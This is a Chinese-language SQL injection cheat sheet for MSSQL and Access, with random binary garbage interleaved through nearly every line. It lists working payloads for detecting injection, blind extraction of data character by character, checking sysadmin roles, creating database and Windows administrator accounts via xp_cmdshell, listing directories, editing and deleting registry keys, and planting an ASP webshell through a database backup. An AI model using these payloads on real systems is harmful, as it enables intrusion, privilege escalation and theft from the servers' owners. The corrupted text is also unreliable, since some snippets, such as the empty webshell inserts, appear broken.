1.判断是否有注入;and 1=1 ;and 1=2 T��yY[8J|�
2.初步判断是否是mssql ;and user>0 R�X�P�0
4�
(Eq0 |�"cj
3.注入参数是字符'and [查询条件] and ''=' \�A�zl6`Em
x0�0"�d$�!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' %�=x�R$<D
o$FqMRep
5.判断数据库系统 �)q&=�x2`
s?�����@{
;and (select count(*) from sysobjects)>0 mssql +R@5e+auQ.
K'+GK S7�.
;and (select count(*) from msysobjects)>0 access *�Em �9R��
[ Lt1O�dGl
Jtnuo]{�R�
U�c/M�PCqZ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 'j6PL;�~�c
?g+0S@{i $
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8l-+
4~mH�
WBFG_])���
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 u�>�Z;�/kr
QK��D�Y:1]
9.(1)猜字段的ascii值(access) ���H�aXlc8
>:!T�fuU^R
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8zS't2
u�
Ad�xCP\S&�
(2)猜字段的ascii值(mssql) !�([Q�1r{u
$`W��.���9
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 U�$@p"�F@P
W��Hk/Rg%<
10.测试权限结构(mssql) ��axW3#3#`
rl�qn3���9
=/&ob%J)9]
2s_shY<=}L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- dVmI.A'nbp
P���sU.dv[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4�h\MSTF*�
Q���ij�Eb�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Qk�B�T,��c
�
+ulB�y��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �P�d��c�F�
p�&ytUT�na
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- n|�dL�K.Q�
W|_
�@j�u
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- G��n��o��p
!:P�F �|dZ
;and 1=(select IS_MEMBER('db_owner'));-- �O�'{UAb+-
(� >zXapb2
NTS
tk{s�,
+h_'hz&HlS
11.添加mssql和系统的帐户 3YVG|B�c~_
n0�q5|�ES
;exec master.dbo.sp_addlogin username;-- 9��oK�Rn�c
;exec master.dbo.sp_password null,username,password;-- J�G ���@bl
r��T9��<_<
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- uUu]�JD�dz
*xR;}�%s\
;exec master.dbo.xp_cmdshell 'net user username password 4��:�R�L[;
o6,�$;-?F_
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- jE|Ju:}��&
��7�K>FC�T
;exec master.dbo.xp_cmdshell 'net user username password /add';-- &;S��.1t�g
Vb�*q^�
�v
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- c-.t8X,5(~
Z�(Fsk�4,
pMn�kh�}Q#
ac�%%*HN,�
12.(1)遍历目录 o<a�k&LX`9
e0Cr>�I5/e
;create table dirs(paths varchar(100), id int) mk.:V64 >;
�+�a_eN�l,
;insert dirs exec master.dbo.xp_dirtree 'c:\' �":E
7�#�9
mJe;BU"�y]
;and (select top 1 paths from dirs)>0 /{Ks�i�+�q
25]Mi2�_�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) G{
~�p�A�4
�0�1<~~6A�
;S�5*�n:d�
h^h,4��H\r
(2)遍历目录 o�?@,f/"�5
~?4'{H�c�'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4^vEMq�8lB
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ���;M}'\�.
Zn�SDq_�Uk
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �VZ�B�T'N
q'�~�?azg:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 H~UxVQLPp�
��Njsz��=�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 >���F+Mu-^
?�JO �x9;`
I)�Y ^_&=�
,4wVQ(,?cd
13.mssql中的存储过程 CK�wrE��]h
&.�D3�f"�
xp_regenumvalues 注册表根键, 子键 MT9c:7}�[&
�M7!�>��-P
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 %>B�?WR\yE
H�f��!o6 o
xp_regread 根键,子键,键值名 Hv2t_QjKT�
T^.;yU_B?�
;exec xp_regread qD�Z?iTHQq
� �Ht|��No
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �Y��SE�RQo
��#��1��2�
xp_regwrite 根键,子键, 值名, 值类型, 值 p.^glz��>B
]��7�"� W(
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 mpfc2>6Il.
'�7�AlE!7%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 KL�D)��h,]
spter3�5b[
xp_regdeletevalue 根键,子键,值名 �Q�SPne�YD
A.tON��Pi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �j��]th6��
|6�/k2d{,(
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ����A8 V7\
�_V�\rs{
5
#T:�#!M�Ka
Y^�DS~Cr�M
14.mssql的backup创建webshell d#E]�>:w�9
o}�H7;v�8H
use model �)jk�X&�7x
8sb�<$M�$c
create table cmd(str image); �#��G2�~#\
?��?�eSGQ|
insert into cmd(str) values (''); "`]�G>,r_�
) *���Mr{`
backup database model to disk='c:\l.asp'; |h�ms'n0��
�K��s
�8��
G?D�7R�/0)
l��"�,JN.w
15.mssql内置函数 ��c ;�_ �T
C-!!1-Eq?:
;and (select @@version)>0 获得Windows的版本号 J��6�0XUxf
�5u
+��U^D
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 'q%�56WAJ�
� ple�LdGq
;and (select user_name())>0 爆当前系统的连接用户 xL��8r'gV@
6[�fp�e��
;and (select db_name())>0 得到当前连接的数据库 xG�:�eS:iT
l�_bvw�o�
9}�p��>='�
-4�ityS
@
16.简洁的webshell �^uB9EP*P�
?�m.WqNBH7
use model �I�B9[L�x�
~\_�aT2j�0
create table cmd(str image); cojtQ�D��6
7�PQ03dtfg
insert into cmd(str) values (''); 9gP-//L@
+�>3X�JlZV
backup database model to disk='g:\wwwtest\l.asp';
